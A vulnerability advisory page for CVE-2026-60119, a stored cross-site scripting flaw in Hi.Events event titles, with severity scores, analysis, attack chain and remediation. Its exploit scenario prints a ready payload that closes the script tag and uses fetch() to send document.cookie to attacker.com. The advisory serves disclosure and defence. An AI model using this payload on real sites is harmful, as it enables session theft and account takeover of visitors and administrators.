Skip to main content

Hi.Events EUVDEUVD-2026-43742

| CVE-2026-60119 MEDIUM
Missing Authorization (CWE-862)
2026-07-14 VulnCheck
5.1
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
5.4 MEDIUM

PR:L for required event creator role, UI:R for victim page-view trigger, S:C for cross-user browser execution enabling session theft from administrators.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jul 14, 2026 - 16:34 vuln.today
Analysis Generated
Jul 14, 2026 - 16:34 vuln.today

DescriptionCVE.org

Hi.Events through v1.10.0-beta contains a cross-site scripting vulnerability that allows authenticated attackers with event creation or edit permissions to inject arbitrary HTML and JavaScript by embedding a malicious event title containing the </script> sequence, which is not escaped by JSON.stringify() when embedded in inline script tags. Attackers can craft an event title that breaks out of the script context in the application/ld+json structured data block or server-side rehydrated state, causing the payload to execute in the browser of any user who views the public event page, including unauthenticated visitors and authenticated administrators.

AnalysisAI

Stored cross-site scripting in Hi.Events through v1.10.0-beta allows authenticated event organizers to inject arbitrary JavaScript into public event pages by embedding the raw </script> sequence in an event title, which the application's JSON.stringify() serialization fails to encode safely when placed in inline script contexts. The payload executes in the browser of every visitor to the affected event page - including unauthenticated attendees and authenticated administrators - enabling session hijacking and privilege escalation from a low-privileged creator account. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain event organizer account
Delivery
Craft event title with </script> HTML break sequence
Exploit
Create or edit public event
Execution
Any visitor loads the event page
Persist
Inline script block is broken, payload executes in victim browser
Impact
Exfiltrate session tokens or perform actions as victim (including administrators)

Vulnerability AssessmentAI

Exploitation Exploitation requires a valid account on the target Hi.Events instance with event creation or editing permissions (the organizer role). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 5.1 with vector AV:N/AC:L/AT:N/PR:L/UI:P captures the key risk dimensions: network-reachable, low complexity, but gated by attacker authentication (PR:L) and passive victim interaction (UI:P - page view). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker registers or uses an existing organizer account on a Hi.Events instance and creates a public event with a title such as '</script><img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">'. Every user who visits the event's public page - including unauthenticated attendees browsing the event listing - triggers the payload, allowing the attacker to harvest session cookies or perform authenticated actions on their behalf, including potentially hijacking an administrator's session to gain full platform control. …
Remediation Upgrade to Hi.Events v1.11.0-beta or later, which resolves this issue via PR #1260 (commit 1e36b070771801ed7113255ef7b3a7f271a2a794) implementing proper output encoding for event titles in inline script contexts. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-43742 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy